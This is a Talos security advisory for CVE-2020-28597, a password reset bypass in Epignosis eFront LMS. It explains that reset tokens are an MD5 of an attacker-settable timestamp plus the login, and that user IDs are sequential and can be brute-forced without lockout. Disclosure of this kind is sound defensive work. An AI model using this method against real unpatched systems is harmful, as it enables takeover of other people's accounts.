Talos Vulnerability Report

TALOS-2020-1221

Epignosis eFront LMS Password Reset authentication bypass vulnerability

March 3, 2020
CVE Number

CVE-2020-28597

Summary

A predictable seed vulnerability eixsts in the password reset functionality of Epignosis EfrontPro 5.2.21. By predicting the seed it is possible to generate the correct password reset 1-time token. An attacker can visit the password reset supplying the password reset token to reset the password of an account of their choice.

Tested Versions

Epignosis eFront LMS 5.2.17
Epignosis eFront LMS 5.2.21

Product URLs

None

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-337 - Predictable Seed in Pseudo-Random Number Generator (PRNG)

Details

The password reset functionality can be accessed at:

http[s]://[DOMAIN]/start/op/password_change/user/[USER_ID]/code/[HASH]

This functionality has a hash generation process that is based directly on the system time, and the login name, which could be the email address. As an attacker you can use the password reset function for a known user to get the system to update the “reset_password_timestamp” to be known (.inc error margin). Knowing this and the user they are targeting they can then calculate the hash and reset the password for the account. The only unknown is the numeric user_id, but these are sequential starting at 0, so this could be brute forced. There does not appear to be a lockout on this function, so a brute force would be possible. There is ID enumeration on this function too, so the user_id keyspace can be verified before starting.

The code that generates the token has to verify it against the one submitted buy the attacker. The ‘reset_password_timestamp’ can be set by the attacker by using the system password reset functionality.

md5($this->reset_password_timestamp.$this->login);

Timeline

2020-12-21 - Vendor Disclosure
2021-02-02 - Vendor Patched
2021-03-03 - Public Release

Credit

Discovered by Richard Dean, Cisco CX Security Advisory EMEAR